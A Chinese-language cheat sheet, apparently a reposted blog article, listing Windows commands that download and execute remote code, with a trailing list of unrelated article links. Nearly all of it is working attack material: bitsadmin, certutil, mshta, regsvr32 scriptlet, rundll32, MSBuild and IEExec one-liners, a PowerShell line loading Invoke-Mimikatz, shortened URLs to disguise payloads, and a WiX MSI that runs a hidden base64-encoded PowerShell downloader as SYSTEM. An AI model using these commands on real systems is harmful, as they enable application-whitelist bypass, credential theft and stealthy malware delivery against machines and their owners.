1.bitsadmin命令(只能命令下载到指定路径上,win7以上):

bitsadmin /transfer myDownLoadJob /download /priority normal "http://img5.cache.netease.com/photo/0001/2013-03-28/8R1BK3QO3R710001.jpg" "d:\abc.jpg"
bitsadmin /transfer d90f http://site.com/a %APPDATA%\d90f.exe&%APPDATA%\d90f.exe&del %APPDATA%\d90f.exe

2.powershell命名下载执行:(win7以上)

powershell IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz

powershell -exec bypass -f \\webdavserver\folder\payload.ps1

powershell (new-object System.Net.WebClient).DownloadFile( ‘http://192.168.168.183/1.exe’,’C:\111111111111111.exe’)

powershell -w hidden -c (new-object System.Net.WebClient).Downloadfile('http://img5.cache.netease.com/photo/0001/2013-03-28/8R1BK3QO3R710001.jpg','d:\\1.jpg')

3.mshta命令下载执行

mshta vbscript:Close(Execute("GetObject(""script:http://webserver/payload.sct"")"))

mshta http://webserver/payload.hta --->短域名:http://sina.lt/-->mshta http://t.cn/RYUQyF8

mshta \\webdavserver\folder\payload.hta

payload.hta

<HTML>

<meta http-equiv="Content-Type" content="text/html; charset=utf-8">

<HEAD>

<script language="VBScript">

Window.ReSizeTo , 

Window.moveTo -,-

Set objShell = CreateObject("Wscript.Shell")

objShell.Run "calc.exe"

self.close

</script>

<body>

demo

</body>

</HEAD>

</HTML>

4.rundll32命令下载执行

rundll32 \\webdavserver\folder\payload.dll,entrypoint

rundll32.exe javascript:"\..\mshtml,RunHTMLApplication";o=GetObject("script:http://webserver/payload.sct");window.close();

参考:https://github.com/3gstudent/Javascript-Backdoor

5.net中的regasm命令下载执行

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regasm.exe /u \\webdavserver\folder\payload.dll

6.cmd的远程命令下载:

cmd.exe /k < \\webdavserver\folder\batchfile.txt

7.regsvr32命令下载执行

regsvr32 /u /n /s /i:http://webserver/payload.sct scrobj.dll

regsvr32 /u /n /s /i:\\webdavserver\folder\payload.sct scrobj.dll

regsvr32 /u /s /i:http://site.com/js.png scrobj.dll

js.png

<?XML version="1.0"?>

<scriptlet>

<registration

    progid="ShortJSRAT"

    classid="{10001111-0000-0000-0000-0000FEEDACDC}" >

    <!-- Learn from Casey Smith @subTee -->

    <script language="JScript">

        <![CDATA[

            ps  = "cmd.exe /c calc.exe";

            new ActiveXObject("WScript.Shell").Run(ps,,true);

        ]]>

</script>

</registration>

</scriptlet>

8.certutil命令下载执行

certutil -urlcache -split -f http://webserver/payload payload

certutil -urlcache -split -f http://webserver/payload.b64 payload.b64 & certutil -decode payload.b64 payload.dll & C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil /logfile= /LogToConsole=false /u payload.dll

certutil -urlcache -split -f http://webserver/payload.b64 payload.b64 & certutil -decode payload.b64 payload.exe & payload.exe

certutil -urlcache -split -f http://site.com/a a.exe && a.exe &&  del a.exe && certutil -urlcache -split -f http://192.168.254.102:80/a delete

9.net中的MSBulid命令下载执行

cmd /V /c "set MB="C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe" & !MB! /noautoresponse /preprocess \\webdavserver\folder\payload.xml > payload.xml & !MB! payload.xml"

10. odbcconf命令下载执行

odbcconf /s /a {regsvr \\webdavserver\folder\payload_dll.txt}

11.cscript脚本远程命令下载执行

cscript /b C:\Windows\System32\Printing_Admin_Scripts\zh-CN\pubprn.vbs 127.0.0.1 script:https://raw.githubusercontent.com/3gstudent/test/master/downloadexec3.sct

cscript //E:jscript \\webdavserver\folder\payload.txt

downfile.vbs:

' Set your settings

strFileURL = "http://www.it1.net/images/it1_logo2.jpg"

strHDLocation = "c:\logo.jpg"

' Fetch the file

Set objXMLHTTP = CreateObject("MSXML2.XMLHTTP")

objXMLHTTP.open "GET", strFileURL, false

objXMLHTTP.send()

If objXMLHTTP.Status =  Then

Set objADOStream = CreateObject("ADODB.Stream")

objADOStream.Open

objADOStream.Type =  'adTypeBinary

objADOStream.Write objXMLHTTP.ResponseBody

objADOStream.Position = 'Set the stream position to the start

Set objFSO = Createobject("Scripting.FileSystemObject")

If objFSO.Fileexists(strHDLocation) Then objFSO.DeleteFile strHDLocation

Set objFSO = Nothing

objADOStream.SaveToFile strHDLocation

objADOStream.Close

Set objADOStream = Nothing

End if

Set objXMLHTTP = Nothing

将以上保存为downfile.vbs

输入命令:cscript  downfile.vbs

12.pubprn.vbs下载执行命令

cscript /b C:\Windows\System32\Printing_Admin_Scripts\zh-CN\pubprn.vbs 127.0.0.1  script:https://gist.githubusercontent.com/enigma0x3/64adf8ba99d4485c478b67e03ae6b04a/raw/a006a47e4075785016a62f7e5170ef36f5247cdb/test.sct

13.windows自带命令copy

copy \\x.x.x.x\xx\poc.exe

xcopy d:\test.exe  \\x.x.x.x\test.exe

14. IEXPLORE.EXE命令下载执行(需要IE存在oday)

"C:\Program Files\Internet Explorer\IEXPLORE.EXE" http://site.com/exp

15.IEEXC命令下载执行

C:\Windows\Microsoft.NET\Framework\v2.0.50727\> caspol -s off

C:\Windows\Microsoft.NET\Framework\v2.0.50727\> IEExec http://site.com/files/test64.exe

参考:https://room362.com/post/2014/2014-01-16-application-whitelist-bypass-using-ieexec-dot-exe/

16. msiexec命令下载执行

msiexec /q /i http://site.com/payloads/calc.png

该方法我之前的两篇文章《渗透测试中的msiexec》《渗透技巧——从Admin权限切换到System权限》有过介绍,细节不再赘述

首先将powershell实现下载执行的代码作base64编码:

$fileContent = "(new-object System.Net.WebClient).DownloadFile('https://github.com/3gstudent/test/raw/master/putty.exe','c:\download\a.exe');start-process 'c:\download\a.exe'"

$bytes  = [System.Text.Encoding]::Unicode.GetBytes($fileContent);

$encoded = [System.Convert]::ToBase64String($bytes);

$encoded

得到:

KABuAGUAdwAtAG8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAGcAaQB0AGgAdQBiAC4AYwBvAG0ALwAzAGcAcwB0AHUAZABlAG4AdAAvAHQAZQBzAHQALwByAGEAdwAvAG0AYQBzAHQAZQByAC8AcAB1AHQAdAB5AC4AZQB4AGUAJwAsACcAYwA6AFwAZABvAHcAbgBsAG8AYQBkAFwAYQAuAGUAeABlACcAKQA7AHMAdABhAHIAdAAtAHAAcgBvAGMAZQBzAHMAIAAnAGMAOgBcAGQAbwB3AG4AbABvAGEAZABcAGEALgBlAHgAZQAnAA==

完整powershell命令为:

powershell -WindowStyle Hidden -enc KABuAGUAdwAtAG8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAGcAaQB0AGgAdQBiAC4AYwBvAG0ALwAzAGcAcwB0AHUAZABlAG4AdAAvAHQAZQBzAHQALwByAGEAdwAvAG0AYQBzAHQAZQByAC8AcAB1AHQAdAB5AC4AZQB4AGUAJwAsACcAYwA6AFwAZABvAHcAbgBsAG8AYQBkAFwAYQAuAGUAeABlACcAKQA7AHMAdABhAHIAdAAtAHAAcgBvAGMAZQBzAHMAIAAnAGMAOgBcAGQAbwB3AG4AbABvAGEAZABcAGEALgBlAHgAZQAnAA==

完整wix文件为:

<?xml version="1.0"?>

<Wix xmlns="http://schemas.microsoft.com/wix/2006/wi">

  <Product Id="*" UpgradeCode="12345678-1234-1234-1234-111111111111" Name="Example Product

Name" Version="0.0." Manufacturer="@_xpn_" Language="">

    <Package InstallerVersion="" Compressed="yes" Comments="Windows Installer Package"/>

    <Media Id="" />

    <Directory Id="TARGETDIR" Name="SourceDir">

      <Directory Id="ProgramFilesFolder">

        <Directory Id="INSTALLLOCATION" Name="Example">

          <Component Id="ApplicationFiles" Guid="12345678-1234-1234-1234-222222222222">

          </Component>

        </Directory>

      </Directory>

    </Directory>

    <Feature Id="DefaultFeature" Level="">

      <ComponentRef Id="ApplicationFiles"/>

    </Feature>

    <Property Id="cmdline">powershell -WindowStyle Hidden -enc KABuAGUAdwAtAG8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAGcAaQB0AGgAdQBiAC4AYwBvAG0ALwAzAGcAcwB0AHUAZABlAG4AdAAvAHQAZQBzAHQALwByAGEAdwAvAG0AYQBzAHQAZQByAC8AcAB1AHQAdAB5AC4AZQB4AGUAJwAsACcAYwA6AFwAZABvAHcAbgBsAG8AYQBkAFwAYQAuAGUAeABlACcAKQA7AHMAdABhAHIAdAAtAHAAcgBvAGMAZQBzAHMAIAAnAGMAOgBcAGQAbwB3AG4AbABvAGEAZABcAGEALgBlAHgAZQAnAA==

    </Property>

    <CustomAction Id="SystemShell" Execute="deferred" Directory="TARGETDIR"

ExeCommand='[cmdline]' Return="ignore" Impersonate="no"/>

    <CustomAction Id="FailInstall" Execute="deferred" Script="vbscript" Return="check">

      invalid vbs to fail install

    </CustomAction>

    <InstallExecuteSequence>

      <Custom Action="SystemShell" After="InstallInitialize"></Custom>

      <Custom Action="FailInstall" Before="InstallFiles"></Custom>

    </InstallExecuteSequence>

  </Product>

</Wix>

将其编译,生成msi文件,命令如下:

candle.exe msigen.wix

light.exe msigen.wixobj

生成test.msi

实现功能:

msiexec /q /i https://github.com/3gstudent/test/raw/master/test.msi

注:

执行后需要手动结束进程msiexec.exe

结合百度提供的短地址服务(http://dwz.cn/), 实现代码为34个字符,代码如下:

msiexec /q /i http://dwz.cn/6UJpF8

17.下载命令执行项目GreatSCT

https://github.com/GreatSCT/

windows下载执行命令大全的更多相关文章

  1. Windows:FTP命令大全

    Windows:FTP命令大全 简介 1, open:与服务器相连接: 2, send(put):上传文件: 3,get:下载文件: 4,mget:下载多个文件: 用法: mget *:下载当前路径下 ...

  2. Windows常用shell命令大全

    Windows常用shell命令大全 基于鼠标操作的后果就是OS界面外观发生改变, 就得多花学习成本.更主要的是基于界面引导Path与命令行直达速度是难以比拟的.另外Geek很大一部分是键盘控,而非鼠 ...

  3. Windows常用shell命令大全(转)

    [Windows常用shell命令大全] 基于鼠标操作的后果就是OS界面外观发生改变, 就得多花学习成本.更主要的是基于界面引导Path与命令行直达速度是难以比拟的.另外Geek很大一部分是键盘控,而 ...

  4. Windows 7运行命令大全

    Windows 7运行命令大全,小编整理了常用的45个Win7运行命令分享给大家:1.cleanmgr:打开磁盘清理工具 2.compmgmt.msc:计算机管理 3.conf:启动系统配置实用程序 ...

  5. Windows下载 Curl 命令

    Windows下载 Curl 命令 描述: 不仅Linux命令行可以使用curl命令下载软件, Windows系统的cmd命令窗口也可以使用curl命令下载,并且更稳定. 原文作者:Wayne Zhu ...

  6. python paramiko实现ssh上传下载执行命令

    paramiko ssh上传下载执行命令 序言 最近项目经常需要动态在跳板机上登录服务器进行部署环境,且服务器比较多,每次完成所有服务器到环境部署执行耗费大量时间.为了解决这个问题,根据所学的执行实现 ...

  7. Windows CMD常用命令大全 运行命令

    http://blog.163.com/lixunhuan@126/blog/static/122060620075124142658/ CMD命令大全 net use \\ip\ipc$ " ...

  8. FW Windows下DOS命令大全(经典收藏)---mklink

    dos command port-->PID: netstat -ano | findstr port | tasklist |findstr "" Windows SYST ...

  9. Windows 经典DOS命令大全

    copy \\ip\admin$\svv.exe c:\ 或:copy\\ip\admin$\*.* 复制对方admini$共享下的srv.exe文件(所有文件)至本地C: xcopy 要复制的文件或 ...

随机推荐

  1. linux安装PHP-memcache-redis扩展

    1.php memcache 扩展 http://pecl.php.net/package/memcache/3.0.8 下载文件源码 #tar zxvf memcache-3.0.8.tar#/us ...

  2. stl源码分析之vector

    上篇简单介绍了gcc4.8提供的几种allocator的实现方法和作用,这是所有stl组件的基础,容器必须通过allocator申请分配内存和释放内存,至于底层是直接分配释放内存还是使用内存池等方法就 ...

  3. Zigbee系列(网络)

    Zigbee设备类型 Coordinator:形成网络,选择信道.PANID.允许其他设备加入等. Router: 作为路由节点,转发报文. End Device: 终端节点,不转发报文. Zigbe ...

  4. Python接口测试实战5(上) - Git及Jenkins持续集成

    如有任何学习问题,可以添加作者微信:lockingfree 课程目录 Python接口测试实战1(上)- 接口测试理论 Python接口测试实战1(下)- 接口测试工具的使用 Python接口测试实战 ...

  5. Django——POST请求及Action触发事件

    添加网页login,将类型置为post,并添加action page,也就是之前写好的页面 添加page网页的views函数,要求获取post指令,如果username及password均正确则跳转到 ...

  6. python的30个编程技巧

     1.原地交换两个数字 x, y =10, 20 print(x, y) y, x = x, y print(x, y) 10 20 20 10 2.链状比较操作符 n = 10 print(1 &l ...

  7. Centos7下安装Seafile实现私有网盘

    Seafile是一个开源.专业.可靠的云存储平台:解决文件集中存储.共享和跨平台访问等问题,由北京海文互知网络有限公司开发,发布于2012年10月:除了一般网盘所提供的云存储以及共享功能外,Seafi ...

  8. vs2017搭建linux c++开发环境

    最近一直在阅读ovs的源码,看到用户态代码的时候,需要对用户态的代码进行调试,一开始想直接使用linux中的GDB进行调试,但是ovs的工程太过于复杂,从网上找了些文章,发现vs2017能够支持lin ...

  9. 深度学习论文笔记:Deep Residual Networks with Dynamically Weighted Wavelet Coefficients for Fault Diagnosis of Planetary Gearboxes

    这篇文章将深度学习算法应用于机械故障诊断,采用了“小波包分解+深度残差网络(ResNet)”的思路,将机械振动信号按照故障类型进行分类. 文章的核心创新点:复杂旋转机械系统的振动信号包含着很多不同频率 ...

  10. KETTLE监控

    kettle单实例环境下自身没有监控工具,但在集群下自带了监控工具. 一.集群自带的监控 kettle自带的集群监控工具可以监控转换的执行情况. 配置好集群后,打开浏览器:输入http://local ...